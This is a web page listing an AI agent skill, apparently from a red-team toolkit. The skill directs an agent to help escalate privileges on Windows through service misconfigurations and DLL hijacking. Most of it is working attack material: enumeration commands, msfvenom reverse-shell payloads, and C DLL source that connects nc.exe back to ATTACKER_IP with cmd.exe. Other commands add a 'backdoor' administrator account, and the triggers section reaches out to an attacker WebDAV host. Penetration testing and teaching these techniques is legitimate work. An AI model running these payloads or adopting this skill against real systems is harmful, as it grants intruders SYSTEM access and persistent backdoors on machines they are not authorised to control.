Agent skill
windows-service-dll-abuse
Exploit Windows service misconfigurations and DLL hijacking for local privilege escalation.
Install this agent skill to your Project
npx add-skill https://github.com/blacklanternsecurity/red-run/tree/main/skills/privesc/windows-service-dll-abuse
SKILL.md
Windows Service Misconfiguration & DLL Hijacking
You are helping a penetration tester escalate privileges on a Windows system by exploiting service misconfigurations and DLL hijacking. All testing is under explicit written authorization.
Engagement Logging
Check for ./engagement/ directory. If absent, proceed without logging.
When an engagement directory exists:
- Print
[windows-service-dll-abuse] Activated → <target>to the screen on activation. - Evidence → save significant output to
engagement/evidence/with descriptive filenames (e.g.,sqli-users-dump.txt,ssrf-aws-creds.json).
State Management
Call get_state_summary() from the state MCP server to read current
engagement state. Use it to:
- Skip re-testing targets, parameters, or vulns already confirmed
- Leverage existing credentials or access for this technique
- Understand what's been tried and failed (check Blocked section)
Your return summary must include:
- New targets/hosts discovered (with ports and services)
- New credentials or tokens found
- Access gained or changed (user, privilege level, method)
- Vulnerabilities confirmed (with status and severity)
- Pivot paths identified (what leads where)
- Blocked items (what failed and why, whether retryable)
Prerequisites
- Shell access on a Windows system
- Tools:
accesschk.exe(Sysinternals),sc.exe(built-in),icacls(built-in) - For DLL hijacking: ability to write files to target directories
- For DLL compilation:
mingwcross-compiler (on attacker machine)
Step 1: Enumerate Services
Get a full picture of the service landscape before checking for specific vulnerabilities.
List all services:
sc query state= all
wmic service list brief
net start
tasklist /SVC
Get-Service | Select-Object Name, Status, StartType | Sort-Object StartType
Get-WmiObject Win32_Service | Select-Object Name, StartMode, PathName, StartName | Where-Object {$_.PathName -notlike "C:\Windows\System32\svchost*"} | Format-Table -AutoSize
Non-default services (most likely to be misconfigured):
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\"
Service account context (what user does each service run as):
wmic service get name,startname,pathname | findstr /i /v "LocalSystem"
Step 2: Unquoted Service Paths
When a service path contains spaces and isn't quoted, Windows tries intermediate
paths. For C:\Program Files\Some App\service.exe, Windows tries:
C:\Program.exeC:\Program Files\Some.exeC:\Program Files\Some App\service.exe
Enumerate unquoted paths:
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows" | findstr /i /v '\"'
# PowerUp
Get-ServiceUnquoted -Verbose
# Manual
Get-WmiObject Win32_Service | Where-Object {$_.PathName -notlike '"*' -and $_.PathName -like '* *' -and $_.PathName -notlike 'C:\Windows\*'} | Select-Object Name, PathName, StartMode
Exploitation:
- Verify write access to one of the intermediate directories:
icacls "C:\Program Files\Some App\"
accesschk.exe -dqv "C:\Program Files\Some App\"
- Place a binary at the hijacked path:
copy C:\temp\payload.exe "C:\Program Files\Some.exe"
- Restart the service:
sc stop <service_name>
sc start <service_name>
Or wait for system reboot if the service is set to auto-start.
Generate payload:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe -o payload.exe
Step 3: Weak Service Permissions
If a service's ACL allows non-admin users to modify it, you can change the binary path to execute arbitrary commands.
Enumerate modifiable services:
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv %USERNAME% * /accepteula
accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula
accesschk.exe -uwcqv "Everyone" * /accepteula
Vulnerable permissions:
SERVICE_ALL_ACCESS— full controlSERVICE_CHANGE_CONFIG— can modify binpathWRITE_DAC— can modify service DACLWRITE_OWNER— can take ownership
Check specific service:
accesschk.exe -ucqv <service_name> /accepteula
sc qc <service_name>
sc sdshow <service_name>
Exploitation — change service binary path:
sc stop <service_name>
sc config <service_name> binpath= "C:\temp\nc.exe -nv ATTACKER_IP 4444 -e C:\WINDOWS\System32\cmd.exe"
sc start <service_name>
Alternative — add local admin user:
sc config <service_name> binpath= "net user backdoor P@ssw0rd123 /add"
sc start <service_name>
sc config <service_name> binpath= "net localgroup administrators backdoor /add"
sc start <service_name>
PowerUp automated exploit:
Invoke-ServiceAbuse -Name <service_name> -Command "C:\temp\nc.exe ATTACKER_IP 4444 -e cmd.exe"
Writable service binary (direct replacement):
icacls "C:\Program Files\VulnApp\service.exe"
If (M) or (F) for your user/group, replace the binary directly:
move "C:\Program Files\VulnApp\service.exe" "C:\Program Files\VulnApp\service.exe.bak"
copy C:\temp\payload.exe "C:\Program Files\VulnApp\service.exe"
sc stop <service_name>
sc start <service_name>
Service registry ACL abuse:
get-acl HKLM:\System\CurrentControlSet\services\<service_name> | Format-List *
If writable, modify ImagePath directly:
reg add "HKLM\SYSTEM\CurrentControlSet\Services\<service_name>" /v ImagePath /t REG_EXPAND_SZ /d "C:\temp\payload.exe" /f
sc stop <service_name>
sc start <service_name>
Step 4: Service Triggers
Some services can be started by low-privilege users via trigger events, even without
SERVICE_START permission.
Enumerate triggers:
sc qtriggerinfo <service_name>
Common trigger types and how to fire them:
Named Pipe trigger (connect to start service):
$pipe = New-Object System.IO.Pipes.NamedPipeClientStream('.', 'PipeNameFromTrigger', [System.IO.Pipes.PipeDirection]::InOut)
try { $pipe.Connect(1000) } catch {}
$pipe.Dispose()
ETW trigger (e.g., WebClient service):
sc qtriggerinfo webclient
# Start WebClient by touching a WebDAV path
pushd \\attacker.com\share
popd
RPC endpoint trigger:
rpcdump.py @127.0.0.1 -uuid <INTERFACE-UUID-FROM-TRIGGER>
Group Policy trigger:
gpupdate /force
Combine with other vectors: If you can write a DLL to a service's search path but can't start the service, fire its trigger to load your DLL.
Step 5: DLL Hijacking — Enumeration
DLL hijacking exploits the Windows DLL search order: when a process loads a DLL by name (not absolute path), Windows searches directories in order.
DLL Search Order (SafeDllSearchMode enabled — default)
- Directory from which the application loaded
C:\Windows\System32C:\Windows\System(16-bit legacy)C:\Windows- Current working directory
- Directories in the
PATHenvironment variable
KnownDLLs (registered in HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs)
always load from System32 — cannot be hijacked.
Find Missing DLLs with Process Monitor
- Open Process Monitor (Procmon.exe)
- Add filters:
- Process Name → contains →
<target_process> - Result → is →
NAME NOT FOUND - Path → ends with →
.dll
- Process Name → contains →
- Start capture, trigger the target process
- Look for DLL load attempts with
NAME NOT FOUNDin writable directories
Find Writable PATH Directories
for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )
$env:PATH -split ';' | ForEach-Object { if(Test-Path $_) { $acl = (icacls $_ 2>$null); if($acl -match '(F|M|W)') { Write-Host "$_ : $acl" } } }
PowerUp DLL Hijacking Checks
Find-PathDLLHijack
Find-ProcessDLLHijack
Check Application Import Table
dumpbin /imports "C:\path\to\application.exe"
Look for DLLs not in System32 or KnownDLLs — these are candidates for hijacking.
Step 6: DLL Hijacking — Exploitation
Basic DLL Payload
// Compile: x86_64-w64-mingw32-gcc -shared -o hijack.dll payload.c
// For x86: i686-w64-mingw32-gcc -shared -o hijack.dll payload.c
#include <windows.h>
BOOL WINAPI DllMain(HINSTANCE hDll, DWORD dwReason, LPVOID lpReserved) {
if (dwReason == DLL_PROCESS_ATTACH) {
system("C:\\temp\\nc.exe ATTACKER_IP 4444 -e cmd.exe");
}
return TRUE;
}
DLL with Local Admin Creation
// x86_64-w64-mingw32-gcc -shared -o hijack.dll payload.c
#include <windows.h>
BOOL WINAPI DllMain(HINSTANCE hDll, DWORD dwReason, LPVOID lpReserved) {
if (dwReason == DLL_PROCESS_ATTACH) {
system("cmd.exe /c net user backdoor P@ssw0rd123 /add && net localgroup administrators backdoor /add");
ExitProcess(0);
}
return TRUE;
}
DLL with Thread (Non-Blocking)
// x86_64-w64-mingw32-gcc -shared -lws2_32 -o hijack.dll payload.c
#include <windows.h>
void Payload() {
system("C:\\temp\\nc.exe ATTACKER_IP 4444 -e cmd.exe");
}
BOOL WINAPI DllMain(HINSTANCE hDll, DWORD dwReason, LPVOID lpReserved) {
if (dwReason == DLL_PROCESS_ATTACH) {
CreateThread(0, 0, (LPTHREAD_START_ROUTINE)Payload, 0, 0, 0);
}
return TRUE;
}
DLL via MSFVenom
# x64 reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f dll -o hijack.dll
# x86 reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f dll -o hijack.dll
# Add user
msfvenom -p windows/adduser USER=backdoor PASS=P@ssw0rd123 -f dll -o hijack.dll
DLL Proxying (Transparent Hijack)
Forward legitimate exports to the real DLL while executing payload. Use when the application validates DLL exports.
Tools:
- DLLirant — generates proxy DLL source from legitimate DLL
- Spartacus — automated DLL hijacking helper
Workflow:
- Identify target DLL loaded by privileged process
- Generate proxy source with DLLirant/Spartacus
- Add payload to
DllMainorDllRegisterServer - Compile proxy DLL
- Rename real DLL (e.g.,
legit.dll→legit_orig.dll) - Drop proxy as
legit.dll— it forwards calls tolegit_orig.dll
COM DLL Hijacking
COM objects load DLLs from paths registered in the registry (InprocServer32).
reg query "HKCU\Software\Classes\CLSID" /s /f "InprocServer32"
If a COM object's InprocServer32 points to a missing or writable DLL path, replace
it with a malicious DLL. COM objects loaded by scheduled tasks or services run as
the task/service account.
Write to HKCU (no admin needed):
reg add "HKCU\Software\Classes\CLSID\{TARGET-CLSID}\InprocServer32" /ve /d "C:\temp\hijack.dll" /f
reg add "HKCU\Software\Classes\CLSID\{TARGET-CLSID}\InprocServer32" /v ThreadingModel /d "Both" /f
Writable System PATH Directory
If you can write to a directory in the system PATH that's searched before the legitimate DLL location:
# Check which PATH directories are writable
accesschk.exe -dqv "C:\Python27"
icacls "C:\Python27"
Drop a DLL with the same name as one loaded by a SYSTEM process. The next time the process loads the DLL, it will find yours first.
Exploitation Workflow
- Identify target (missing DLL or writable DLL directory for privileged process)
- Compile appropriate DLL payload (match architecture: x86 vs x64)
- Drop DLL to target location
- Trigger the DLL load:
- Restart the service:
sc stop <svc> && sc start <svc> - Fire service trigger (Step 4)
- Wait for scheduled task / system reboot
- Force GPUpdate:
gpupdate /force
- Restart the service:
- Verify escalation: check reverse shell or
net localgroup administrators
Step 7: Auto-Updater and IPC Abuse
Third-party software with local update mechanisms can be exploited for SYSTEM code execution.
Common patterns:
- Localhost HTTP listeners (check
netstat -ano | findstr LISTENING) - Named pipes with weak ACLs
- IPC channels accepting commands from any local user
Enumeration:
netstat -ano | findstr LISTENING | findstr 127.0.0.1
Look for non-standard ports. Research the application associated with each PID:
tasklist /FI "PID eq <pid>"
Exploitation approach:
- Identify the IPC protocol (HTTP, named pipe, TCP socket)
- Research the application for known CVEs or command injection
- Test for origin validation bypass (e.g.,
Host: trusted.vendor.com.attacker.tld) - Forge enrollment/update commands to trigger malicious payload installation
Escalate for specific vendor CVEs and IPC exploitation techniques.
Step 8: Escalate or Pivot
Troubleshooting
"Access denied" when modifying service
Your user doesn't have SERVICE_CHANGE_CONFIG on this service. Check with
accesschk.exe -ucqv <service_name>. Try other services or different vectors.
Service won't restart after modification
Some services fail to start with modified binpath (wrong return code, crash).
Use binpath= "cmd.exe /c <payload>" or create a wrapper that executes the
payload then exits cleanly.
DLL architecture mismatch
32-bit process loads 32-bit DLLs, 64-bit loads 64-bit. Check with tasklist /v
or file <binary>. Compile with matching mingw:
i686-w64-mingw32-gcc (x86) vs x86_64-w64-mingw32-gcc (x64).
DLL is in KnownDLLs — can't hijack
DLLs registered in HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs
always load from System32. Target a different DLL loaded by the same process, or
use DLL side-loading (place signed EXE + malicious DLL in writable directory).
Process Monitor not available
Use PowerUp's Find-PathDLLHijack and Find-ProcessDLLHijack as alternatives.
Or check PATH directory permissions manually and cross-reference with service
binary imports (dumpbin /imports).
Service runs but payload doesn't execute
DLL's DllMain may not be reached if the application loads it via LoadLibraryEx
with LOAD_LIBRARY_AS_DATAFILE. In that case, the DLL must export a function
the application calls — use DLL proxying to ensure export compatibility.
Recommended Agent Skills
Expand your agent's capabilities with these related and highly-rated skills.
credential-recovery
Offline credential and file recovery with hashcat and john. Use when any skill captures hashes (NTLM, Kerberos TGS/AS-REP, shadow, MSCACHE2) or encrypted files (ZIP, Office, PDF, KeePass, SSH key, 7z, RAR). Trigger phrases: "recover this hash", "offline recovery", "john", "hashcat", "zip2john", "password-protected file". Do NOT use for online password attacks (spraying, brute force against services) — use password-spraying instead.
remote-access-enumeration
Enumeration of remote access services: FTP, SSH, RDP, VNC, and WinRM. Checks anonymous access, default credentials, version vulnerabilities, and authentication methods. Use after network-recon identifies remote access ports.
smb-enumeration
SMB share enumeration, access testing, password policy extraction, and content searching. Enumerates shares via null session, guest, and authenticated access. Covers share listing, per-share access testing, MANSPIDER content search, and SMB vulnerability detection (signing, EternalBlue). Use after network-recon identifies SMB ports (139/445).
infrastructure-enumeration
Enumeration of infrastructure services: DNS, SMTP, SNMP, IPMI, NFS, TFTP, RPC/MSRPC, and HTTP/HTTPS surface detection. Checks zone transfers, open relays, default community strings, cipher zero, NFS exports, and web technology fingerprinting. Use after network-recon identifies infrastructure ports.
network-recon
Network reconnaissance, host discovery, port scanning, and OS fingerprinting. Produces a port/service map that the orchestrator uses to route to service-specific enumeration skills.
container-escapes
Container escape, Docker breakout, and Kubernetes exploitation.
Didn't find tool you were looking for?